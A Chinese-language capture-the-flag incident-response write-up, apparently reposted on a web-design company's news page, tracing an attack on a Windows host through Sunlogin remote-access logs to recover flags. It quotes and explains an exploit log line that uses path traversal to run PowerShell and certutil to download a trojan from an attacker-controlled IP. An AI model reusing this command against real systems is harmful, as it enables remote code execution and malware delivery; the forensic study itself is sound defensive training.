尧图网站建设 尧图网络
  • 首页
  • 关于我们
  • 服务项目
  • 案例展示
  • 建站流程
  • 资讯中心
  • 联系我们
首页/资讯中心/详情

第四章 windows实战-向日葵

第四章 windows实战-向日葵
📅 发布时间:2026/6/19 18:46:35

第四章 windows实战-向日葵

1、通过本地 PC RDP到服务器并且找到黑客首次攻击成功的时间为 为多少,将黑客首次攻击成功的时间为 作为 FLAG 提交(2028-03-26 08:11:25.123);

翻阅日志的时候发现了在3月21日的时候黑客就已经开始发起进攻了但是一直没有成功

image-20251020165444537

直到在3月26日的时候黑客执行了ping命令和whoami的操作,这些操作是黑客首次上线会执行的操作之一确定自己是什么用户权限等

image-20251020170019750

flag{2024-03-26 10:16:25.585}

2、通过本地 PC RDP到服务器并且找到黑客攻击的 IP 为多少,将黑客攻击 IP 作为 FLAG 提交;

从上一题可以知道黑客连接的ip为

flag{192.168.31.45}

3、通过本地 PC RDP到服务器并且找到黑客托管恶意程序 IP 为,将黑客托管恶意程序 IP 作为 FLAG 提交;

继续翻阅日志在下面发现了一个exe执行程序

image-20251020170240608

[Acceptor][HTTP] new RC HTTP connection 192.168.31.45:49329, 
path: /check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+certutil+-urlcache+-split+-f+http%3A%2F%2F192.168.31.249%2Fmain.exe, 
version: HTTP/1.1

二、逐部分解析

关键字段 说明
192.168.31.45:49329 攻击者的来源IP和端口(客户端发起连接)
/check?cmd=... 访问的路径;?cmd= 表明目标Web服务可能有命令执行功能(例如一个远程控制或监控接口)
%2F URL编码的/,表示攻击者在尝试目录穿越(Path Traversal)。../../../../ 让命令越过应用目录,进入系统路径。
windows/system32/WindowsPowerShell/v1.0/powershell.exe 攻击者调用系统的 PowerShell。说明服务程序已经执行了外部命令(RCE成立)。
certutil -urlcache -split -f http://192.168.31.249/main.exe 这是 下载恶意文件的命令:使用 Windows 内置的 certutil 工具下载远程木马 main.exe。这也是一个典型的“利用系统自带工具绕过防护”的方式。
192.168.31.249 被控机器要去下载的木马服务器(黑客控制端 IP)
plugin:check, session:sobGzXzWBfSlSbdqnmkUbJMLEjhssRx1 说明服务端接受了请求并分配了一个会话ID(session)。这意味着命令被正常解析执行。
flag{192.168.31.249}

4、找到黑客解密 DEC 文件,将黑客DEC 文件的 md5 作为 FLAG 提交;

继续翻阅日志在下面发现了一个qq号

image-20251020171256162

QQ搜索一下发现了一个群聊

image-20251020171343067

image-20251020171431231

image-20251020171611262

拿到密码题目要求我们进行md5加密

image-20251020171704546

flag{5ad8d202f80202f6d31e077fc9b0fc6b}

5、通过本地 PC RDP到服务器并且解密黑客勒索软件,将桌面加密文件中关键信息作为 FLAG 提交;

打开桌面上的 baoleiji.txt文件

image-20251020174020465

image-20251020174043752

和.DEC文件复制到一个txt里面

image-20251020174110900

拿去网站进行 rsa解密 https://try8.cn/tool/cipher/rsa

NXVJSTQUAPGTXKSX

image-20251020174605360

再拿去RSA解密

解密得到flag,iv偏移量是16个0;

image-20251020174645463

@suanve
时间是连续的,年份只是人类虚构出来用于统计的单位,2024年第一天和2023年最后一天,
不会有任何本质区别。你的花呗,你的客户,你的体检报告,窗外的寒风,都不会因为这是新的一年,
而停下对你的毒打。
GIVE YOU FLAG!!!!!
flag{EDISEC_15c2e33e-b93f-452c-9523-bbb9e2090cd1}

也是很励志了

相关新闻

  • 第四章 windows实战-emlog
  • Docling + LangChain + RAG 构建智能文档问答系统
  • 完整教程:【Linux】基础知识与操作汇总:一份给新手的 Linux 学习总结

最新新闻

  • Go应用安全开发指南:从依赖扫描到运行时防护的完整实践
  • 2026年口碑好的河北工业研磨机/工业研磨机/河北数控双头前角研磨机/数控一体研磨机精选厂家推荐 - 行业平台推荐
  • 2026年正规的四川铣床机械加工/四川数控连床机械加工定制加工厂家推荐 - 品牌宣传支持者
  • 2026年知名的太仓视觉非标自动化设备/太仓单端热敏非标自动化设备/IGBT非标自动化设备厂家哪家好 - 行业平台推荐
  • 2026年可靠的郑州代账报税/郑州代账性价比高的公司 - 品牌宣传支持者
  • 2026荆州漏水检测维修精选优质服务商TOP5推荐!卫生间漏水/厨房漏水/屋顶天花板漏水/阳台漏水/地下室漏水防水补漏检测维修-正规防水补漏公司优选口碑榜测评推荐 - 即刻修防水

日新闻

  • 信任的进化:技术实现详解——如何用JavaScript构建博弈论模拟器
  • Terrakube自定义工作流:如何集成OPA、Infracost等工具扩展IaC能力
  • grunt-concurrent快速入门:5分钟学会并行运行Grunt任务

周新闻

  • 3步解锁iOS设备:applera1n激活锁绕过完全指南
  • 39 2026 人工智能证书终极盘点,普通人选 AI 证书可以从这些方向入手
  • Redis 暴露公网有多危险?从端口检查到补救步骤

月新闻

  • 【总结】入门篇:50句话让你记住架构核心概念
  • WeChatMsg技术方案解析:实现Mac微信数据自主管理的完整解决方案
  • WeChatMsg:革新性微信数据备份方案,打造你的专属数字记忆库

关于尧图

  • 公司简介
  • 团队介绍
  • 企业文化
  • 荣誉资质

服务项目

  • 定制开发
  • 电商建站
  • UI 设计
  • 运维服务

快速链接

  • 案例展示
  • 建站流程
  • 常见问题
  • 资讯中心

联系方式

  • 📍北京市朝阳区互联网产业园 A 座 10 层
  • 📞400-888-8888
  • ✉️contact@rkmt.cn
  • 🕐周一至周日 9:00-21:00

© 2024 北京尧图网络科技有限公司 版权所有 | 京 ICP 备 XXXXXXXX 号